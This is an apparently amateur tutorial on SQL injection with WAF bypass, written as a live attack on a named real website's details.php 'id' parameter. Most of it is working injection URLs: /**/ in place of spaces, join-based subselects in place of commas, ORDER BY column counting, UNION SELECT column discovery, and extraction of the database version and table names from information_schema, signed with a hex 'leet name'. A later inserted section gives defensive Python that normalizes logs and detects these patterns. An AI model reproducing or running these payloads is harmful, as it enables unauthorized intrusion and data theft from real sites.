Hi, today we will learn how to bypass white spaces and commas when they are blocked by a WAF.
Let's start.
Code::
http://bluegrassmidwest.com/details.php?id=18
When I put ' it generates an error message, which is very good for an injector:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version
for the right syntax to use near ''18''' at line 1
This error is generated due to a mismatch in the query.
Now when I tried to fix the query it generated a different error ...
http://bluegrassmidwest.com/details.php?id=18' %23
ERROR::
Warning: Cookie names cannot contain any of the following '=,; \t\r\n\013\014' in /home/bgmidwest/domains/bluegrassmidwest.com/public_html/details.php
on line 8 error setting cookie
I tried with null bytes, --+ etc.; it generates the same error...
Now when I remove the white spaces it worked !!!
White spaces bypassed with /**/....
http://bluegrassmidwest.com/details.php?id=18'/**/%23 Query fix
Now after that I tried to find the columns using order by..
http://bluegrassmidwest.com/details.php?id=18'/**/order by 1%23
Error again, due to the white spaces. Put /**/ between every word and the error is gone !!
http://bluegrassmidwest.com/details.php?id=18'/**/order/**/by/**/1%23
At 12 columns it generated the error message unknown column 12.
It means it has 11 columns.
Now try to find the vulnerable column. For that purpose we will use Union select.
Vulnerable columns finding ::
http://bluegrassmidwest.com/details.php?id=18'/**/uNIon/**_**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11%23
But it generates the same error !!
It means something is wrong with the commas.
Let's try to bypass the comma :::
Here are the three methods which I know and mostly use to bypass the [,] COMMA
1) union select 1/*!,*/ 2/*!,*/3
2) union select 1,CHAR(44), 2,CHAR(44),3,char(44)
3)(select 1)a join (select 2)b join (select 3)c
So we will use the 3rd option, which is called joining.
PHP CODE::
http://bluegrassmidwest.com/details.php?id=-18%27union/**/select/**/*/**/from/**/(select/**/1)a/**/join/**/(select/**/2)b/**/join/**/(select/**/3)c/**/join/**/(select/**/4)d/**/join/**/(select/**/5)e/**/join/**/(select/**/6)f/**/join/**/(select/**/7)g/**/join/**/(select/**/8)h/**/join/**/(select/**/9)i/**/join/**/(select/**/10)j/**/join/**/(select/**/11)k%23
Now it will show us the vulnerable columns. Columns 2 3 4 7 10 are vulnerable.
How can we perform DIOS ??
For this we will use a separator.
First of all we put our leet name in column 2
inject by Faryabi = 0x696e6a6563742062792046617279616269 (hex)
http://bluegrassmidwest.com/details.php?id=-18%27union/**/select/**/*/**/from/**/(select/**/1)a/**/join/**/(select/**/0x696e6a6563742062792046617279616269)b/**/join/**/(select/**/3)c/**/join/**/(select/**/4)d/**/join/**/(select/**/5)e/**/join/**/(select/**/6)f/**/join/**/(select/**/7)g/**/join/**/(select/**/8)h/**/join/**/(select/**/9)i/**/join/**/(select/**/10)j/**/join/**/(select/**/11)k%23
Now the version::
http://bluegrassmidwest.com/details.php?id=-18%27union/**/select/**/*/**/from/**/(select/**/1)a/**/join/**/(select/**/0x696e6a6563742062792046617279616269)b/**/join/**/(select/**/group_concat(version()/**/separator/**/0x203a3a207e7472306a416e2a203a3a))c/**/join/**/(select/**/4)d/**/join/**/(select/**/5)e/**/join/**/(select/**/6)f/**/join/**/(select/**/7)g/**/join/**/(select/**/8)h/**/join/**/(select/**/9)i/**/join/**/(select/**/10)j/**/join/**/(select/**/11)k%23
Now the tables ::
http://bluegrassmidwest.com/details.php?id=-18%27union/**/select/**/*/**/from/**/(select/**/1)a/**/join/**/(select/**/0x696e6a6563742062792046617279616269)b/**/join/**/(select/**/group_concat(version()/**/separator/**/0x203a3a207e7472306a416e2a203a3a))c/**/join/**/(select/**/(select(group_concat(table_name/**/separator/**/0x3c62723e))/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database()))d/**/join/**/(select/**/5)e/**/join/**/(select/**/6)f/**/join/**/(select/**/7)g/**/join/**/(select/**/8)h/**/join/**/(select/**/9)i/**/join/**/(select/**/10)j/**/join/**/(select/**/11)k%23
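From the defender's side, the /**/ whitespace trick and the join-based comma bypass above only fool a signature that inspects the raw request. The following is an added example, not code from the original post: it percent-decodes the query string, replaces MySQL inline comments with a space, and only then matches signatures, so the hidden spaces and commas no longer matter. The log lines, host and signature names are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (hypothetical host, not the site in the post); lines 2 and 3
# reuse the /**/ whitespace and join-based comma-less request shapes shown above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /details.php?id=18 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /details.php?id=18%27/**/order/**/by/**/1%23 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /details.php?id=-18%27union/**/select/**/*/**/from/**/'
    '(select/**/1)a/**/join/**/(select/**/2)b%23 HTTP/1.1" 200 1024',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /details.php?page=2&q=join+us HTTP/1.1" 200 512',
]

COMMENT_RE = re.compile(r"/\*.*?\*/", re.DOTALL)   # MySQL inline comment used as a space substitute
LOG_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')  # request target out of a combined-format line

# Signatures run against the NORMALIZED query, so how spaces or commas were hidden is irrelevant.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b\s*(?:all\s+)?select\b"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),      # column-count probing
    "commaless_join": re.compile(r"\bjoin\s*\(\s*select\b"),   # (select 1)a join (select 2)b ...
    "schema_enum": re.compile(r"\binformation_schema\b"),
}

def normalize(query: str) -> str:
    """Percent-decode (bounded, to undo double encoding), comments -> space, collapse whitespace."""
    decoded = query
    for _ in range(3):
        again = unquote_plus(decoded)
        if again == decoded:
            break
        decoded = again
    text = COMMENT_RE.sub(" ", decoded)
    return re.sub(r"\s+", " ", text).strip().lower()

def naive_union_rule(line: str) -> bool:
    """What a raw-string signature sees: 'union/**/select' never matches it."""
    return "union select" in line.lower()

def scan_line(line: str) -> list:
    """Names of every signature matching the normalized query string of one log line."""
    m = LOG_RE.search(line)
    if not m:
        return []
    _path, _, query = m.group(1).partition("?")
    norm = normalize(query)
    return [name for name, rx in SIGNATURES.items() if rx.search(norm)]

def scan_log(lines) -> dict:
    """Map line index -> matched signature names, for lines that matched anything."""
    findings = {}
    for i, line in enumerate(lines):
        hits = scan_line(line)
        if hits:
            findings[i] = hits
    return findings
```

Running `scan_log(SAMPLE_LOG)` flags lines 1 and 2 only, while `naive_union_rule` misses the comment-obfuscated union on line 2 entirely.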
I hope u got something ... specially noobs like me ...
Thanks for reading.